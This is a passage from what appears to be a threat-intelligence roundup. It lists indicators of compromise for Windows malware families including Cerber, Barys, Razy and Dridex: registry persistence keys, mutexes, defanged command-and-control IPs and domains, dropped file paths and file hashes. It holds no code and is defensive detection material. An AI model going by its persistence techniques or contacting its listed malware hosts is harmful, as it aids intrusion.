\n`%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\df76fe148f41309232d46b5526143610.exe` | 1 \n`%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\8d580f86972cdfde2bbd41845bc851f9.exe` | 1 \n`%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\32814b0ea96b317a805dd9174ee7c5c4.exe` | 1 \n`%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\ee28203cdc477e7ad13344342ffe1e0b.exe` | 1 \n`%TEMP%\\Internet Explorer.exe` | 1 \n`%APPDATA%\\winziy.exe` | 1 \n`%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\9b900e9e6a204ac0d795c328b297a541.exe` | 1 \n`%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\3e80006ed1a558f4a4e8c67b4482a653.exe` | 1 \n`%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\8b9c85cea1b5bc95470d5b663265abba.exe` | 1 \n`%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\driver.url` | 1 \n`%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\driver.exe` | 1 \n`%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\1bb40c47beae292b8957771d185e2963.exe` | 1 \n`%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\e44b3d2d77e82bfaa8fbe232c3fac08b.exe` | 1 \n`%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\c4d9b868e64e2ec7e7f1e04c6e64ac91.exe` | 1 \n`%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\213668f5f21ad17f1b3d939134e17f24.exe` | 1 \n`%APPDATA%\\winx.exe` | 1 \n \n*See JSON for more IOCs\n\n#### File Hashes\n\n` 0462bc4b60370728471971b9326c2e1540370809292ffd6cb5791a61df705bf9 0b331c29e38da9fe5fe00f40e2af43a4ac960ce48539b34e6d506c3b54a49920 162616259b6591503807bda2b9228c88409f4a71c085bc4b39d5eef2b64213c9 1846cfe96f4733d9cc7620cff603abdf1c44fe2f84d34daa79c14b04a726357d 21f09de33d10673fb5f8c2f1cf5924f5b81019e037a44b7f151da61b84c85b0d 275e4d554f63db96a64bbca5f0b30ab96199c8595ea0c3c2d46a413f30387a2f 2b140d53ec1d99cc07662d85f14bae2a4e6cfea3b7d66da0b31be4ecd641bae1 2c55658cf368c0f4f16b9f142e6ee6adb91362c79eb5ecab77d93852b35b7599 3022c3729827f0f7ea739b18b073e6c488ce6481eedaae147cc33738401d131e 339e7b601f00ee4b80af2645e1e39a8b71901d328d1c56e4f42e7ba74f16b618 3d8b6537791fe4f05043a40cc0cff83fb5ae54396c40fded6daae018a7a03c0e 437d2adb9946aeb1e630619e4aa571149d2adedeea8f6d0c39c1bed21c4063cb 459304f70aa2e992bdaed0915ec96cda9c99c6edde30698197319f8fa40a4024 461ec9be4e72154e7faebde91b452dbf0c22281405f0966eeddf69330f91ad2d 51e865bd11fd5daff52c74c0072c6e713535d4a90d5b1398b78c806be1a59dc9 53b7c2eadbb2686d6bcfed439d656df597b396f0004b086a9aad6806e7810256 63779c53cc4ab5d02daadffdd2f7b93b3bfc1a137eb1e5a895d7e2b8393f42a5 6b1bbec6381d6c95ef40d1ddb1ffbc015777d30686d9ba4353857f35b5947e15 6e178460a0f54a86e71df31ac2e90ffbaaf00a41ce9722257613f33ed9acc892 79d129fd698fbf62084545a105e6bd3cc027435a42ae3eb48c3e62c6e2ec461e 80aab48e04978ab54b4a50bba68286d1f03af19b27e78e8263b360d10c7f5904 84bddfdc96745d0be34f31be3b7e4160db6e04fa7d7648ebf03b81807841bffb 86da48f0943d29d940c8ea86a26695026e0a3b5ff74c08cd1189d84e05a57d97 8789bba00344fcb155e891679121b770a4daabe0171a78fccbef5b92322f4105 8ac101bcbb0a30f23ff1f7fb341a3daaa7ff13f045c0e812ac9f6c5079ef82af `\n\n*See JSON for more IOCs\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAMP |  \nCloudlock | N/A \nCWS |  \nEmail Security |  \nNetwork Security |  \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella | N/A \nWSA |  \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-vCCx56X9Gbs/XiIw8gJ-GAI/AAAAAAAADI0/1ag2zEuHoNE5YN4coSXJqOtdlzRuakStQCLcBGAsYHQ/s1600/21f09de33d10673fb5f8c2f1cf5924f5b81019e037a44b7f151da61b84c85b0d_amp.png>)\n\n \n\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-dtUO5Nu3rpI/XiIxA8SG6PI/AAAAAAAADI8/YH-lnvycAV8Ej-OI9sBxmRoQukAxCYdBQCLcBGAsYHQ/s1600/ec56a0a4ba7d45994dd8a6757dc1eb730228ca5ce23380085f501a50ba8ae7b3_tg.png>)\n\n \n\n\n \n\n\n* * *\n\n### Win.Malware.Cerber-7533438-1\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\ADVANCED \nValue Name: Hidden ` | 25 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\ADVANCED \nValue Name: ShowSuperHidden ` | 25 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\ADVANCED \nValue Name: SuperHidden ` | 25 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\EXPLORER \nValue Name: Run ` | 25 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\COMMAND PROCESSOR \nValue Name: AutoRun ` | 25 \n`<HKCU>\\CONTROL PANEL\\DESKTOP \nValue Name: SCRNSAVE.EXE ` | 25 \n`<HKCU>\\PRINTERS\\DEFAULTS\\{21A3D5EE-E123-244A-98A1-8E36C26EFF6D} ` | 25 \n`<HKCU>\\PRINTERS\\DEFAULTS ` | 25 \n`<HKLM>\\BCD00000000\\OBJECTS\\{926583E4-EF64-11E4-BEED-D6738078AD98}\\ELEMENTS\\16000009 \nValue Name: Element ` | 24 \n`<HKLM>\\BCD00000000\\OBJECTS\\{926583E4-EF64-11E4-BEED-D6738078AD98}\\ELEMENTS\\250000E0 \nValue Name: Element ` | 23 \n`<HKLM>\\BCD00000000\\OBJECTS\\{926583E4-EF64-11E4-BEED-D6738078AD98}\\ELEMENTS\\250000E0 ` | 23 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: fsutil ` | 2 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUNONCE \nValue Name: fsutil ` | 2 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: logman ` | 2 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUNONCE \nValue Name: logman ` | 2 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUNONCE \nValue Name: rasautou ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: EhStorAuthn ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUNONCE \nValue Name: EhStorAuthn ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: ntoskrnl ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUNONCE \nValue Name: ntoskrnl ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: eventcreate ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUNONCE \nValue Name: eventcreate ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: isoburn ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUNONCE \nValue Name: isoburn ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: hh ` | 1 \nMutexes | Occurrences \n---|--- \n`shell.{381828AA-8B28-3374-1B67-35680555C5EF}` | 24 \nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`31[.]184[.]234[.]0/25` | 25 \n`208[.]95[.]112[.]1` | 25 \n`69[.]195[.]146[.]130` | 1 \nDomain Names contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`ip-api[.]com` | 25 \nFiles and or directories created | Occurrences \n---|--- \n`%APPDATA%\\{6F885251-E36F-0FE6-9629-63208157D7A2}` | 25 \n`%APPDATA%\\{6F885251-E36F-0FE6-9629-63208157D7A2}\\Component_00` | 25 \n`%APPDATA%\\{6F885251-E36F-0FE6-9629-63208157D7A2}\\Component_01` | 25 \n`%APPDATA%\\{6F885251-E36F-0FE6-9629-63208157D7A2}\\Component_03` | 25 \n`%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp\\fsutil.lnk` | 2 \n`%APPDATA%\\{6F885251-E36F-0FE6-9629-63208157D7A2}\\fsutil.exe` | 2 \n`%System32%\\Tasks\\fsutil` | 2 \n`%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp\\logman.lnk` | 2 \n`%APPDATA%\\{6F885251-E36F-0FE6-9629-63208157D7A2}\\logman.exe` | 2 \n`%System32%\\Tasks\\logman` | 2 \n`%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp\\odbcconf.lnk` | 1 \n`%APPDATA%\\{6F885251-E36F-0FE6-9629-63208157D7A2}\\odbcconf.exe` | 1 \n`%System32%\\Tasks\\javaws` | 1 \n`%System32%\\Tasks\\logagent` | 1 \n`%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp\\ARP.lnk` | 1 \n`%APPDATA%\\{6F885251-E36F-0FE6-9629-63208157D7A2}\\ARP.EXE` | 1 \n`%System32%\\Tasks\\perfhost` | 1 \n`%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp\\perfhost.lnk` | 1 \n`%APPDATA%\\{6F885251-E36F-0FE6-9629-63208157D7A2}\\perfhost.exe` | 1 \n`%System32%\\Tasks\\EhStorAuthn` | 1 \n`%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp\\verclsid.lnk` | 1 \n`%APPDATA%\\{6F885251-E36F-0FE6-9629-63208157D7A2}\\verclsid.exe` | 1 \n`%System32%\\Tasks\\verclsid` | 1 \n`%System32%\\Tasks\\rasautou` | 1 \n`%System32%\\Tasks\\mfpmp` | 1 \n \n*See JSON for more IOCs\n\n#### File Hashes\n\n` 0c7e5bb1cee76e9863ce3b44c24eec38b1eb92892c5b60a833982516a54e9b76 28374ce7589aacac9039559d75f55b2fc82976fbb26e9fcbd4932ae9fba0ff59 358ef9b233660e1630b16cb46e59ca4e8e568aba5d18d2011d01531831656a4f 49b45cd004664bfa865adf65e6f0721c32e26855854ae36e1edbf807c70f6bda 52b992d21becd7be682c2922364a752c8175ef0061a7acd6f4edc077f80e82b1 5602333889bbd3667cb416a50968d930d482b2c85ceb1bea928378118f582d8a 622889cf94266b040d5fc4b648c5010da452d773d6af23eb6d92ef087e885de0 63920b6de768c6e2b2168c51b1e37ade32c2963c9ab270298a6a2c41d413b81f 674fabcda596680972f25c7a01401805f612211a6949231b6b0b51a7b4dc4bb6 75b7b2dbc574900f135e4b0e640ab9ba649309a8d6ad8dee502f24a777873bcf 79ad8ad6a72e5014dee5f21dc71d8dbb580aa2214f39680d990e5f9fae2c033a 80376654651c543804118148246ba881732d1c03312f3a5966bc750a5b9323d0 807a64e31851a9e6b31b848e8cf3f98aee708c3f9fb202083380dbb6c01e1ab6 90a475321d0b15ea933d816290542ba4eaf96b24275d5ad89f54f2e2986a1c6e 91c10c1d3338faa90223e12db01178109fee544d1cdd598c9e6eb2441df372df a36b78449ee435b25af5f6af94ef15831ad257e5d311ebb21d5ed65fb13ac9d3 b54d186c102b61025a31209381847c9a92cbcc3de0180b85c1acd14eaf4543ac c4a92d2271b389d943298c11e93283ea32565956a7d36497de0efdbc41c050c5 c51909551fe0e12ac55b976834ec5e529819b9865afa470bc39ca19ebc50855f d85fd7e3a234d353f00bb58d8630e67de2e654ce33fbe13e1a11c74f3840ebdd db39d08dd5b947bff9410e63a7a120aea4ea8c466af50ffc14c42e8d19df14c8 de64250a40802d3495fa2b0d6deac9ea159652e4e7b3c52d54abe55d986f0973 e6e307c6d4abeb1aa62f20c16cd0bf9cfc667ee945d4e6e7332e475d922c70af e6fa6eca90b0231944129a2b9573ac03c019a788f91044cc50e743b0dd0fd9fa f75b4f1eb4715ad1f6289df06ae3f1ef5e992fa36e4cdebd27ccdb6106945076 `\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAMP |  \nCloudlock | N/A \nCWS |  \nEmail Security |  \nNetwork Security |  \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella | N/A \nWSA |  \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-KH8Ebadzxj8/XiIxOnUtkrI/AAAAAAAADJE/hh-8IwESxrEQiePz6oEZZyOpmTyRlXPwwCLcBGAsYHQ/s1600/a36b78449ee435b25af5f6af94ef15831ad257e5d311ebb21d5ed65fb13ac9d3_amp.png>)\n\n \n\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-2hgJ5eNsa_k/XiIxSHr2ZeI/AAAAAAAADJM/OW8A9qAZTB8c2xe9T0XX-T7kxg1NxvWTQCLcBGAsYHQ/s1600/a36b78449ee435b25af5f6af94ef15831ad257e5d311ebb21d5ed65fb13ac9d3_tg.png>)\n\n \n\n\n \n\n\n* * *\n\n### Win.Packed.Barys-7532466-0\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\ADVANCED \nValue Name: Hidden ` | 26 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: dbe70bc52631c4df155a4a1a865cf25d ` | 26 \n`<HKCU>\\SOFTWARE\\SHORTCUTINFECTION \nValue Name: NOiR ` | 14 \n`<HKCU>\\SOFTWARE\\SHORTCUTINFECTION ` | 14 \nMutexes | Occurrences \n---|--- \n`~[P6Er7#4$&WJr83!]~` | 26 \nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`41[.]38[.]1[.]86` | 1 \n`141[.]255[.]155[.]177` | 1 \n`41[.]239[.]65[.]189` | 1 \n`206[.]189[.]182[.]212` | 1 \n`178[.]80[.]27[.]0` | 1 \nDomain Names contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`b10j[.]ddns[.]net` | 1 \n`uploadapk[.]ddns[.]net` | 1 \n`anadnjwan[.]zapto[.]org` | 1 \n`xmu51k[.]ddns[.]net` | 1 \n`youssefassd1[.]hopto[.]org` | 1 \n`clivou[.]ddns[.]net` | 1 \n`hack-qi[.]no-ip[.]info` | 1 \n`camifer93[.]ddns[.]net` | 1 \n`ronaldo20[.]no-ip[.]org` | 1 \n`zabanahacker[.]no-ip[.]org` | 1 \n`magicfuny12[.]publicvm[.]com` | 1 \n`badr123[.]ddns[.]net` | 1 \n`level[.]publicvm[.]com` | 1 \n`rostom071995[.]ddns[.]net` | 1 \n`microsoftstores[.]sytes[.]net` | 1 \nFiles and or directories created | Occurrences \n---|--- \n`%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\svchost.exe` | 26 \n`%TEMP%\\DarkData.dat` | 26 \n`%HOMEPATH%\\Start Menu\\Programs\\Startup\\svchost.exe` | 21 \n`%TEMP%\\Microsoft` | 18 \n`%TEMP%\\Microsoft\\svchost.exe` | 18 \n`\\autorun.inf` | 13 \n`E:\\<random, matching '[a-z]{4,7}'>.exe` | 12 \n`%TEMP%\\dw.log` | 9 \n`%TEMP%\\<random, matching '[A-F0-9]{4,5}'>.dmp` | 9 \n`%LOCALAPPDATA%\\WOrm.exe` | 6 \n`%APPDATA%\\Microsoft\\Windows\\Cookies\\WOrm.exe` | 6 \n`%APPDATA%\\Microsoft\\Windows\\Network Shortcuts\\WOrm.exe` | 6 \n`%APPDATA%\\Microsoft\\Windows\\Printer Shortcuts\\WOrm.exe` | 6 \n`%APPDATA%\\Microsoft\\Windows\\Recent\\WOrm.exe` | 6 \n`%APPDATA%\\Microsoft\\Windows\\SendTo\\WOrm.exe` | 6 \n`%APPDATA%\\Microsoft\\Windows\\Start Menu\\WOrm.exe` | 6 \n`%APPDATA%\\Microsoft\\Windows\\Templates\\WOrm.exe` | 6 \n`\\<random, matching '[a-z]{4,7}'>.exe` | 6 \n`%HOMEPATH%\\AppData\\WOrm.exe` | 6 \n`%APPDATA%\\WOrm.exe` | 6 \n`%HOMEPATH%\\Contacts\\WOrm.exe` | 6 \n`%HOMEPATH%\\Cookies\\WOrm.exe` | 6 \n`%HOMEPATH%\\Desktop\\WOrm.exe` | 6 \n`%HOMEPATH%\\Documents\\My Music\\WOrm.exe` | 6 \n`%HOMEPATH%\\Documents\\My Pictures\\WOrm.exe` | 6 \n \n*See JSON for more IOCs\n\n#### File Hashes\n\n` 004e01f888cb6241fc7da95d1798830ed0c52ea179b1ed0b2f71598e7d83fdc4 006261e3d8b0d00ae9f6596dd914440a19b1b0ab333533c03fd75c3e63f07f0d 022d2461933a4aafe67d8ddb3c5fd7f14eea9035dec79bea200ff1d57776762d 02de146284642091fd6104b2a09a0a5ffc92d51c28e8c492acecbd39fb0c30e0 033645d3516e2f25ddb3566c1eed8a6be6d3c023f7f0e98c868efa12483dfac3 04ce16123c1db27009dfd8a2546810c881a22b6eeed4697d64cb44af2e69e75d 0780a44389bf1a4cde74cc26d87cf3ee10ab0f19ba75dc941abacb0939f6c0fd 085a78af5d0146251a13bc743866fe4292d84a6c0753c6e6fcbb91d2c7826dfe 0887bb1422d2b1a80b0912816d2e776afe9db36ae392887c30dffb6950b39190 08d8cf4bd5635a6930758f7736259f230ff559ede4880d044aa4eaed47f37115 0b0c9946d82dba06fceda4ce8a8f2a8ad828adba44e630f4652a5784d4305e5c 0c85f4b989930dd44f791828bad61061e8ff325142e1dd275fa30295a343c051 0d638e32faab7502716a78610e97a4c55974ff1c648784aa66294f1e594cbe1f 0de13ccba02abce52ee48511d094b474fbf8807aa54ea316f86a83befe85a1b6 1081f90d1fa09214611b5e0255d714db254f502e945069e93973eb0f63d00208 12bd605a3b68b17d0279e5fd34cb2c9dee540f4eb1b248447d101c9199ebfaf5 12f1c270b4df8c8baa2eb194f85267da965450cf35696644d71d3835a3905e1b 13c397c69dd1c2357af059f5760a551567834c836b6d124e4e1ffee085feda80 1493472fd451f1109f5c245245469e6882f92d34610a6c468e3af5dd9acdac89 17b64ea8a52fce27bcd439a2762f6a8dff4235c10ca99a60722e481509e42b0b 1888096d2e773f3e1377ee329bf649d0032e384badd451731cc1f6cf7eb924ce 18a5f4a28bd04a9e6b7283aa80bfe4649e48cac3592f72fed511e10935c80678 18f55fa2f805d9a0aa51b6c6e934b9ea14d4c63fb578811dad1d7816e5758b71 1962b11c5701a4b591c219a30164708e42bad73e72a58b5896cfa48c0ad20ed5 1a91bfeb723c4ad729eea5e22da6f8afeecbdb990a18c3272e1fc92d7c94bdae `\n\n*See JSON for more IOCs\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAMP |  \nCloudlock | N/A \nCWS |  \nEmail Security |  \nNetwork Security |  \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella | N/A \nWSA |  \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-fgb3pvwEXlE/XiIxgdtAs2I/AAAAAAAADJQ/RjZ8gdZK6nYyTdIFPzGYXSl84K5tOndqQCLcBGAsYHQ/s1600/04ce16123c1db27009dfd8a2546810c881a22b6eeed4697d64cb44af2e69e75d_amp.png>)\n\n \n\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-0VtSwWcmMpY/XiIxkxPIA6I/AAAAAAAADJU/OKID_zPptEIITjGHeUT0_Z3jsrr_pGjrgCLcBGAsYHQ/s1600/2bd3451c8410d9d8d34470eb2d49c7061584ef1bebb31cadd4dc10e3e7ad31b0_tg.png>)\n\n \n\n\n#### Malware\n\n[](<https://1.bp.blogspot.com/-51RmBbmX5dw/XiIxpg16sLI/AAAAAAAADJY/z31ZelV58-kop45RA8Q2DM_09yaLuE2_gCLcBGAsYHQ/s1600/04ce16123c1db27009dfd8a2546810c881a22b6eeed4697d64cb44af2e69e75d_malware.png>)\n\n \n\n\n \n\n\n* * *\n\n### Win.Packed.Razy-7532659-0\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKCU>\\SOFTWARE\\7E3975E4EF230D7D9195 ` | 4 \n`<HKCU>\\SOFTWARE\\7E3975E4EF230D7D9195 \nValue Name: 7E3975E4EF230D7D9195 ` | 4 \n`<HKCU>\\ENVIRONMENT \nValue Name: SEE_MASK_NOZONECHECKS ` | 2 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINLOGON \nValue Name: ParseAutoexec ` | 2 \n`<HKCU>\\SOFTWARE\\FECBD0A484C99B705CF7099E6CE11887 ` | 2 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: fecbd0a484c99b705cf7099e6ce11887 ` | 2 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: fecbd0a484c99b705cf7099e6ce11887 ` | 2 \n`<HKCU>\\SOFTWARE\\FECBD0A484C99B705CF7099E6CE11887 \nValue Name: [kl] ` | 2 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\SYSTEMCERTIFICATES\\AUTHROOT\\AUTOUPDATE \nValue Name: LastSyncTime ` | 1 \nMutexes | Occurrences \n---|--- \n`fca-1de3ff845109` | 4 \n`jicaltapntot` | 3 \n`gfgdgdfdgfggfdgfdgbfdbgdfbgdfbgfdbgdfbgdfbgdfbgdfbgdfgbdfgbdfgdfbdgfbgdfbgdfbgdbfgbdfdgbfgbfdvbvdgfdgfbvgdbfvdgfbvdgfvb` | 2 \n`fecbd0a484c99b705cf7099e6ce11887` | 2 \n`022-1b90e6b10b98` | 1 \nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`51[.]15[.]40[.]85` | 17 \n`177[.]75[.]44[.]41` | 3 \n`177[.]75[.]44[.]147` | 2 \n`169[.]254[.]255[.]255` | 1 \n`72[.]21[.]81[.]240` | 1 \n`104[.]20[.]68[.]143` | 1 \n`104[.]20[.]67[.]143` | 1 \n`109[.]202[.]107[.]15` | 1 \nDomain Names contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`rentry[.]co` | 17 \n`jhonjhon4842[.]ddns[.]net` | 5 \n`pastebin[.]com` | 2 \n`ctldl[.]windowsupdate[.]com` | 1 \n`noregisterdomain[.]zapto[.]org` | 1 \nFiles and or directories created | Occurrences \n---|--- \n`%APPDATA%\\explorer.exe` | 3 \n`%TEMP%\\explorer.exe` | 2 \n`%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\fecbd0a484c99b705cf7099e6ce11887.exe` | 2 \n \n#### File Hashes\n\n` 04c3f0070bc08bafddfeb011497eb893c37f63397b535dcedee9e5ac89e246c3 0e754a806b2813874c47332e98a8c118bd1e33508b44ff0081ac36a48814d769 120924a5852db8a4333cf74fc1f067f51a70a996de994bc4ce727ff1377f6023 16ca75f09433409d790695af612f4ee560c265f3f084b6dc04bcbebff2ebe964 3a1a6f80ea8aa66ce456ab0cd452ad38e12b3c904432fedb5a0242c987f84c81 4ca2e3f2272455e38269d69d20dbb16c1572befe8b81a92c4acdae93341549d2 5c4dee777eb540663373b08b31b5d69d52fe9108317b21b697ea2487a2b8621d 747b1a101bb3a43a6c0b58fb8a50d8ac9777ea704911e7df27edf8c81ead883e 7f85c722bf97008aafd593730ccf252318ffb8ad00645aa0e13eab7d76c96687 8953d845fe687b2a8c5e92a0a7b2aa9dcb5c61dd271983194ef300476faee3de 95384877ed6e9a9e726ff1d18bd0fd137160e4943e0bebe59c7f7a8bfd3b25d8 b58590a3a09129a3a1e55195b0f1a39bb278a4ee1c21257aa2d74b425f09e649 c679ac377cc06ef337c78bcd3882b4e0ad5023d9649c1e37296f98252573bd57 d2e84fc71ada0566834f9dcd871b927c3e52603b73cf2bc0d923fbba79fc205f db7f08e2ae8fdb796d8420ef16ef539f2c8fe24ddabadf5a46cc7148b5c50e8a ded370384b5abe048734193ae8281852d2f68cf93cdec658bb0047ed7314c9a6 efa4ffb921031f5c2cd960f2d24e56140dd2c0d549e2a7b2ea69e4ab0cb47dae f24917e59deff96fe4107de88d80815c5aa45d3e7aa711ad772ea031bcfdcc1d f5c8e5e5303aedd99923c610e3b0ecd34095fdff10ae120d1be6648c5bdc3e89 `\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAMP |  \nCloudlock | N/A \nCWS |  \nEmail Security |  \nNetwork Security |  \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella |  \nWSA |  \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-eU-xaKLp84Y/XiIx70iv7jI/AAAAAAAADJk/JLJuW1qVwIMcHQmwwI8Dmyo6aHbDjc91QCLcBGAsYHQ/s1600/db7f08e2ae8fdb796d8420ef16ef539f2c8fe24ddabadf5a46cc7148b5c50e8a_amp.png>)\n\n \n\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-G1FNrSD8osM/XiIx_qDj2WI/AAAAAAAADJo/5rM-Q2nRDZM8VSESeSTrCL6QXpV-oLXhwCLcBGAsYHQ/s1600/db7f08e2ae8fdb796d8420ef16ef539f2c8fe24ddabadf5a46cc7148b5c50e8a_tg.png>)\n\n \n\n\n#### Umbrella\n\n[](<https://1.bp.blogspot.com/-rnF_8yn3aCE/XiIyEeb9XGI/AAAAAAAADJs/F9_v9eKTP8QxmNq33fOqfyiWlNBHlkEBACLcBGAsYHQ/s1600/0e754a806b2813874c47332e98a8c118bd1e33508b44ff0081ac36a48814d769_umbrella.png>)\n\n \n\n\n \n\n\n* * *\n\n### Win.Packed.Dridex-7532883-1\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUNONCE \nValue Name: trkcore ` | 12 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\SYSTEM \nValue Name: DisableTaskMgr ` | 12 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\ACTION CENTER\\CHECKS\\{C8E6F269-B90A-4053-A3BE-499AFCEC98C4}.CHECK.0 \nValue Name: CheckSetting ` | 12 \nMutexes | Occurrences \n---|--- \n`bxHV8AirRi` | 1 \n`nN6zSKd5De` | 1 \n`1aGmpK2Fpc` | 1 \n`7hIVwzEnv1` | 1 \n`E6Q6j6YTV8` | 1 \n`Irun61Xn7d` | 1 \n`JLSADdwil0` | 1 \n`NPXzzJejTH` | 1 \n`WWN630213P` | 1 \n`XPF1tOcJMb` | 1 \n`2WpU6TmEPW` | 1 \n`3ZJhaY3yr9` | 1 \n`5he85143TO` | 1 \n`KjY7CSFqPz` | 1 \n`R9uXS0pi9F` | 1 \n`TV4I4E35W8` | 1 \n`eDiPKSpzC6` | 1 \n`yebXkefg8w` | 1 \n`CCbi4gfgIs` | 1 \n`OuaMk6vUKi` | 1 \n`RiFp6vyARh` | 1 \n`W6ArquGVYc` | 1 \n`cLgrRVqAOx` | 1 \n`rw74rlool5` | 1 \n`vxudb0VN9b` | 1 \n \n*See JSON for more IOCs\n\nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`172[.]217[.]11[.]46` | 12 \n`104[.]20[.]67[.]143` | 7 \n`104[.]20[.]68[.]143` | 5 \nDomain Names contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`pastebin[.]com` | 12 \n`www[.]4zjjwywndb[.]com` | 1 \n`www[.]wyek9gljwv[.]com` | 1 \n`www[.]dhpydj8zow[.]com` | 1 \n`www[.]xy5xc1pa3f[.]com` | 1 \n`www[.]dw4kr1pwbg[.]com` | 1 \n`www[.]bz11msxwlf[.]com` | 1 \n`www[.]65vxrzb8us[.]com` | 1 \n`www[.]qiht7hodpf[.]com` | 1 \n`www[.]gfuhlqwl2q[.]com` | 1 \n`www[.]xdctdxp8w3[.]com` | 1 \n`www[.]hfhfl9jloc[.]com` | 1 \n`www[.]gvkkyn2d5c[.]com` | 1 \n`www[.]womizyhbm9[.]com` | 1 \n`www[.]zboz6h96hz[.]com` | 1 \n`www[.]ssgj6cpx0k[.]com` | 1 